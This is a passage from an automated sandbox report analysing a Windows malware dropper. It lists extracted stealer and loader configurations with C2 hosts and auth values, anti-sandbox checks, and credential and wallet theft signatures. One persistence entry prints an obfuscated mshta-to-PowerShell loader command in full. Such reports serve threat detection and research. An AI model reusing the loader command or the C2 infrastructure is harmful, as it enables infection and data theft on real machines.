Analysis
-
max time kernel
143s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
10-03-2022 03:36
Static task
static1
Behavioral task
behavioral1
Sample
699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe
Resource
win10v2004-en-20220113
General
-
Target
699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe
-
Size
4.2MB
-
MD5
63c2c40cfa3ba6928b82cd1433f1167d
-
SHA1
28af8a5a3ba4e050c558c34e422d78c2ac240b43
-
SHA256
699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6
-
SHA512
a8a0eadd9bb9f795856b07e5b4ec4bd3ae18446436448f949c40e049a823ff5c742639b0b196f3b59582567c5e461a2500e0b446c8662ea873dc310d1377774d
Malware Config
Extracted
http://62.204.41.192/-RED/NAN.oo
Extracted
http://62.204.41.192/-RED/NON.oo
Extracted
http://62.204.41.192/-RED/RED.oo
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.wygexde.xyz/
https://sa-us-bucket.s3.us-east-2.amazonaws.com/asdhjk/
Extracted
smokeloader
2020
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
Extracted
redline
Travis
5.182.5.22:33809
-
auth_value
6fa3251b9d70327e7d1e5851c226af23
Extracted
redline
fdfsdf
86.107.197.196:63065
-
auth_value
49c341b88f13528ba52befa3c6ca7ebb
Extracted
redline
jack
5.182.5.203:33873
-
auth_value
6d03d90d7d897b871fe8bfcaec8c6ae0
Signatures
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 832 3588 rUNdlL32.eXe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
Processes:
resource yara_rule behavioral2/memory/3340-377-0x0000000000140000-0x0000000000361000-memory.dmp family_redline behavioral2/memory/4340-388-0x0000000000F10000-0x0000000000F30000-memory.dmp family_redline behavioral2/memory/3284-405-0x0000000000C70000-0x0000000000E93000-memory.dmp family_redline behavioral2/memory/3284-432-0x0000000000C70000-0x0000000000E93000-memory.dmp family_redline behavioral2/memory/3284-408-0x0000000000C70000-0x0000000000E93000-memory.dmp family_redline behavioral2/memory/3340-390-0x0000000000140000-0x0000000000361000-memory.dmp family_redline behavioral2/memory/3284-389-0x0000000000C70000-0x0000000000E93000-memory.dmp family_redline C:\Users\Admin\Documents\3um2ASQgdHK5qhmvaTd2nHR7.exe family_redline behavioral2/memory/3340-370-0x0000000000140000-0x0000000000361000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Installation.exe family_socelars C:\Users\Admin\AppData\Local\Temp\Installation.exe family_socelars C:\Users\Admin\Documents\JyIHoBk_ZcAJMkpXEDxdKejd.exe family_socelars C:\Users\Admin\Documents\JyIHoBk_ZcAJMkpXEDxdKejd.exe family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
OnlyLogger Payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/4268-178-0x00000000005B0000-0x00000000005E0000-memory.dmp family_onlylogger behavioral2/memory/4268-179-0x0000000000400000-0x0000000000464000-memory.dmp family_onlylogger behavioral2/memory/3372-430-0x0000000000400000-0x0000000000492000-memory.dmp family_onlylogger behavioral2/memory/3372-420-0x0000000002120000-0x0000000002164000-memory.dmp family_onlylogger -
Blocklisted process makes network request 9 IoCs
Processes:
cmd.exepowershell.exepowershell.exepowershell.exeflow pid process 223 2228 cmd.exe 227 2228 cmd.exe 237 2228 cmd.exe 241 2228 cmd.exe 268 5916 powershell.exe 269 5976 powershell.exe 270 6028 powershell.exe 275 6028 powershell.exe 270 6028 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
Processes:
Files.exeFile.exeInstall.exeKRSetp.exeFolder.exejg3_3uag.exeInstallation.exepub2.exeInfo.exepzyh.exeFolder.exejfiag3g_gg.exejfiag3g_gg.exeZLQHmcinqrtmxG29JeWHldZs.exefHSnWneP5Q6EoIhPpSeU5djN.exesJhVl0NkN0zJV8udxG08WE7g.exewu1bLlMbnJY1fSGdGO5pnIe7.exeCd9sx7e1hcpQNdlgHi0TDACn.exeWerFault.exeZJdaWucTUPWvvHp7cyQhgO6f.exe_0y86lmH_Y5w2jgAjGURyIoy.exedzAnISXyBAB9TJgfQpiJNqgn.execmd.exeVqpRmeW35ZNTRZEr_XdyQtZF.exef2lCpeMBm5aZjIxJZYyknrN9.exekfIx4AeXaIwJT4gAZvt28Hop.exeVkqg65q1o6YbJlG1k8WTpH4b.exehg6o6ShsofU_l9G5bh1ptRCJ.exelWIxRZFsQrh1cFnOUnJtWK7Z.exeYK5kC4ak2RRcQ9kSdeWgayqF.exeInstall.exeInstall.exe_0y86lmH_Y5w2jgAjGURyIoy.exe_0y86lmH_Y5w2jgAjGURyIoy.exeAccostarmi.exe.pifpid process 2556 Files.exe 5096 File.exe 4268 Install.exe 444 KRSetp.exe 4628 Folder.exe 4072 jg3_3uag.exe 2400 Installation.exe 1684 pub2.exe 4776 Info.exe 4308 pzyh.exe 3396 Folder.exe 3440 jfiag3g_gg.exe 1572 jfiag3g_gg.exe 2452 ZLQHmcinqrtmxG29JeWHldZs.exe 480 fHSnWneP5Q6EoIhPpSeU5djN.exe 3340 sJhVl0NkN0zJV8udxG08WE7g.exe 3372 wu1bLlMbnJY1fSGdGO5pnIe7.exe 2432 Cd9sx7e1hcpQNdlgHi0TDACn.exe 4340 WerFault.exe 3284 ZJdaWucTUPWvvHp7cyQhgO6f.exe 5060 _0y86lmH_Y5w2jgAjGURyIoy.exe 4532 dzAnISXyBAB9TJgfQpiJNqgn.exe 2228 cmd.exe 1572 VqpRmeW35ZNTRZEr_XdyQtZF.exe 3076 f2lCpeMBm5aZjIxJZYyknrN9.exe 3636 kfIx4AeXaIwJT4gAZvt28Hop.exe 5212 Vkqg65q1o6YbJlG1k8WTpH4b.exe 5220 hg6o6ShsofU_l9G5bh1ptRCJ.exe 5236 lWIxRZFsQrh1cFnOUnJtWK7Z.exe 5408 YK5kC4ak2RRcQ9kSdeWgayqF.exe 5872 Install.exe 5360 Install.exe 5772 _0y86lmH_Y5w2jgAjGURyIoy.exe 4704 _0y86lmH_Y5w2jgAjGURyIoy.exe 3008 Accostarmi.exe.pif -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe upx C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe vmprotect C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe vmprotect behavioral2/memory/4072-144-0x0000000000400000-0x0000000000664000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exelWIxRZFsQrh1cFnOUnJtWK7Z.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lWIxRZFsQrh1cFnOUnJtWK7Z.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lWIxRZFsQrh1cFnOUnJtWK7Z.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
kfIx4AeXaIwJT4gAZvt28Hop.exehg6o6ShsofU_l9G5bh1ptRCJ.exewu1bLlMbnJY1fSGdGO5pnIe7.exe699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exeFiles.exeFolder.exeInfo.exefHSnWneP5Q6EoIhPpSeU5djN.exeInstall.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation kfIx4AeXaIwJT4gAZvt28Hop.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation hg6o6ShsofU_l9G5bh1ptRCJ.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation wu1bLlMbnJY1fSGdGO5pnIe7.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Files.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Folder.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Info.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation fHSnWneP5Q6EoIhPpSeU5djN.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Install.exe -
Loads dropped DLL 4 IoCs
Processes:
rundll32.exepub2.exefHSnWneP5Q6EoIhPpSeU5djN.exepid process 3808 rundll32.exe 1684 pub2.exe 480 fHSnWneP5Q6EoIhPpSeU5djN.exe 480 fHSnWneP5Q6EoIhPpSeU5djN.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/5236-419-0x00007FF6F6320000-0x00007FF6F68CE000-memory.dmp themida behavioral2/memory/5236-414-0x00007FF6F6320000-0x00007FF6F68CE000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
pzyh.exemsedge.exepowershell.exeYK5kC4ak2RRcQ9kSdeWgayqF.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" pzyh.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Eyxrppteq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mzpexsf\\Eyxrppteq.exe\"" YK5kC4ak2RRcQ9kSdeWgayqF.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
jg3_3uag.exelWIxRZFsQrh1cFnOUnJtWK7Z.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg3_3uag.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lWIxRZFsQrh1cFnOUnJtWK7Z.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 25 ip-api.com 274 ipinfo.io 18 ipinfo.io 19 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe autoit_exe -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
sJhVl0NkN0zJV8udxG08WE7g.exeZJdaWucTUPWvvHp7cyQhgO6f.exepid process 3340 sJhVl0NkN0zJV8udxG08WE7g.exe 3284 ZJdaWucTUPWvvHp7cyQhgO6f.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
_0y86lmH_Y5w2jgAjGURyIoy.exepowershell.exepowershell.exeYK5kC4ak2RRcQ9kSdeWgayqF.exedescription pid process target process PID 5060 set thread context of 4704 5060 _0y86lmH_Y5w2jgAjGURyIoy.exe _0y86lmH_Y5w2jgAjGURyIoy.exe PID 5916 set thread context of 5948 5916 powershell.exe RegAsm.exe PID 5976 set thread context of 5532 5976 powershell.exe RegSvcs.exe PID 5408 set thread context of 4688 5408 YK5kC4ak2RRcQ9kSdeWgayqF.exe MSBuild.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\da0ae165-d20f-415a-ad77-e11e96c1d44d.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220310033717.pma setup.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3544 3808 WerFault.exe rundll32.exe 5780 3076 WerFault.exe 5800 1572 WerFault.exe VqpRmeW35ZNTRZEr_XdyQtZF.exe 2552 3372 WerFault.exe wu1bLlMbnJY1fSGdGO5pnIe7.exe 5868 1572 WerFault.exe VqpRmeW35ZNTRZEr_XdyQtZF.exe 4192 3076 WerFault.exe 536 2452 WerFault.exe 5224 3372 WerFault.exe wu1bLlMbnJY1fSGdGO5pnIe7.exe 5528 3372 WerFault.exe wu1bLlMbnJY1fSGdGO5pnIe7.exe 5352 2452 WerFault.exe 2552 3372 WerFault.exe wu1bLlMbnJY1fSGdGO5pnIe7.exe 4656 3372 WerFault.exe wu1bLlMbnJY1fSGdGO5pnIe7.exe 5280 3372 WerFault.exe wu1bLlMbnJY1fSGdGO5pnIe7.exe 3700 3372 WerFault.exe wu1bLlMbnJY1fSGdGO5pnIe7.exe 6140 3372 WerFault.exe wu1bLlMbnJY1fSGdGO5pnIe7.exe 4340 5532 WerFault.exe RegSvcs.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
pub2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
fHSnWneP5Q6EoIhPpSeU5djN.exepowershell.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString fHSnWneP5Q6EoIhPpSeU5djN.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString powershell.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 fHSnWneP5Q6EoIhPpSeU5djN.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 5144 schtasks.exe 5012 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 6012 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 4760 tasklist.exe 4956 tasklist.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
Install.exemsedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4204 taskkill.exe 4804 taskkill.exe 5080 taskkill.exe 3444 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Processes:
cmd.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 cmd.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e cmd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exejfiag3g_gg.exepub2.exeidentity_helper.exepid process 4756 msedge.exe 4756 msedge.exe 2256 msedge.exe 2256 msedge.exe 1572 jfiag3g_gg.exe 1572 jfiag3g_gg.exe 1684 pub2.exe 1684 pub2.exe 4420 identity_helper.exe 4420 identity_helper.exe 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pub2.exepid process 1684 pub2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 2256 msedge.exe 2256 msedge.exe 2256 msedge.exe 2256 msedge.exe 2256 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Installation.exeKRSetp.exetaskkill.exesvchost.exejg3_3uag.execmd.exedescription pid process Token: SeCreateTokenPrivilege 2400 Installation.exe Token: SeAssignPrimaryTokenPrivilege 2400 Installation.exe Token: SeLockMemoryPrivilege 2400 Installation.exe Token: SeIncreaseQuotaPrivilege 2400 Installation.exe Token: SeMachineAccountPrivilege 2400 Installation.exe Token: SeTcbPrivilege 2400 Installation.exe Token: SeSecurityPrivilege 2400 Installation.exe Token: SeTakeOwnershipPrivilege 2400 Installation.exe Token: SeLoadDriverPrivilege 2400 Installation.exe Token: SeSystemProfilePrivilege 2400 Installation.exe Token: SeSystemtimePrivilege 2400 Installation.exe Token: SeProfSingleProcessPrivilege 2400 Installation.exe Token: SeIncBasePriorityPrivilege 2400 Installation.exe Token: SeCreatePagefilePrivilege 2400 Installation.exe Token: SeCreatePermanentPrivilege 2400 Installation.exe Token: SeBackupPrivilege 2400 Installation.exe Token: SeRestorePrivilege 2400 Installation.exe Token: SeShutdownPrivilege 2400 Installation.exe Token: SeDebugPrivilege 2400 Installation.exe Token: SeAuditPrivilege 2400 Installation.exe Token: SeSystemEnvironmentPrivilege 2400 Installation.exe Token: SeChangeNotifyPrivilege 2400 Installation.exe Token: SeRemoteShutdownPrivilege 2400 Installation.exe Token: SeUndockPrivilege 2400 Installation.exe Token: SeSyncAgentPrivilege 2400 Installation.exe Token: SeEnableDelegationPrivilege 2400 Installation.exe Token: SeManageVolumePrivilege 2400 Installation.exe Token: SeImpersonatePrivilege 2400 Installation.exe Token: SeCreateGlobalPrivilege 2400 Installation.exe Token: 31 2400 Installation.exe Token: 32 2400 Installation.exe Token: 33 2400 Installation.exe Token: 34 2400 Installation.exe Token: 35 2400 Installation.exe Token: SeDebugPrivilege 444 KRSetp.exe Token: SeDebugPrivilege 3444 taskkill.exe Token: SeTcbPrivilege 5024 svchost.exe Token: SeTcbPrivilege 5024 svchost.exe Token: SeTcbPrivilege 5024 svchost.exe Token: SeTcbPrivilege 5024 svchost.exe Token: SeTcbPrivilege 5024 svchost.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeManageVolumePrivilege 4072 jg3_3uag.exe Token: SeManageVolumePrivilege 4072 jg3_3uag.exe Token: SeManageVolumePrivilege 4072 jg3_3uag.exe Token: SeManageVolumePrivilege 4072 jg3_3uag.exe Token: SeManageVolumePrivilege 4072 jg3_3uag.exe Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeShutdownPrivilege 3032 Token: SeCreatePagefilePrivilege 3032 Token: SeCreateTokenPrivilege 2228 cmd.exe Token: SeAssignPrimaryTokenPrivilege 2228 cmd.exe Token: SeLockMemoryPrivilege 2228 cmd.exe Token: SeIncreaseQuotaPrivilege 2228 cmd.exe Token: SeMachineAccountPrivilege 2228 cmd.exe Token: SeTcbPrivilege 2228 cmd.exe -
Suspicious use of FindShellTrayWindow 39 IoCs
Processes:
File.exemsedge.exeAccostarmi.exe.pifpid process 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 2256 msedge.exe 5096 File.exe 5096 File.exe 2256 msedge.exe 5096 File.exe 5096 File.exe 2256 msedge.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 3008 Accostarmi.exe.pif 3032 3032 3008 Accostarmi.exe.pif 3008 Accostarmi.exe.pif 3032 3032 3032 3032 3032 3032 3032 3032 3032 3032 -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
File.exeAccostarmi.exe.pifpid process 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 5096 File.exe 3008 Accostarmi.exe.pif 3008 Accostarmi.exe.pif 3008 Accostarmi.exe.pif -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
Info.exefHSnWneP5Q6EoIhPpSeU5djN.exesJhVl0NkN0zJV8udxG08WE7g.exeZLQHmcinqrtmxG29JeWHldZs.exedzAnISXyBAB9TJgfQpiJNqgn.execmd.exeZJdaWucTUPWvvHp7cyQhgO6f.exekfIx4AeXaIwJT4gAZvt28Hop.exehg6o6ShsofU_l9G5bh1ptRCJ.exeVqpRmeW35ZNTRZEr_XdyQtZF.exef2lCpeMBm5aZjIxJZYyknrN9.exeVkqg65q1o6YbJlG1k8WTpH4b.exeInstall.exeInstall.exeAccostarmi.exe.pifpid process 4776 Info.exe 480 fHSnWneP5Q6EoIhPpSeU5djN.exe 3340 sJhVl0NkN0zJV8udxG08WE7g.exe 2452 ZLQHmcinqrtmxG29JeWHldZs.exe 4532 dzAnISXyBAB9TJgfQpiJNqgn.exe 2228 cmd.exe 3284 ZJdaWucTUPWvvHp7cyQhgO6f.exe 3636 kfIx4AeXaIwJT4gAZvt28Hop.exe 5220 hg6o6ShsofU_l9G5bh1ptRCJ.exe 1572 VqpRmeW35ZNTRZEr_XdyQtZF.exe 5220 hg6o6ShsofU_l9G5bh1ptRCJ.exe 3076 f2lCpeMBm5aZjIxJZYyknrN9.exe 5212 Vkqg65q1o6YbJlG1k8WTpH4b.exe 5872 Install.exe 5360 Install.exe 3008 Accostarmi.exe.pif -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exeFiles.exemsedge.exeFolder.exedescription pid process target process PID 1484 wrote to memory of 2556 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Files.exe PID 1484 wrote to memory of 2556 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Files.exe PID 1484 wrote to memory of 2556 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Files.exe PID 2556 wrote to memory of 5096 2556 Files.exe File.exe PID 2556 wrote to memory of 5096 2556 Files.exe File.exe PID 2556 wrote to memory of 5096 2556 Files.exe File.exe PID 1484 wrote to memory of 2256 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe msedge.exe PID 1484 wrote to memory of 2256 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe msedge.exe PID 1484 wrote to memory of 4268 1484 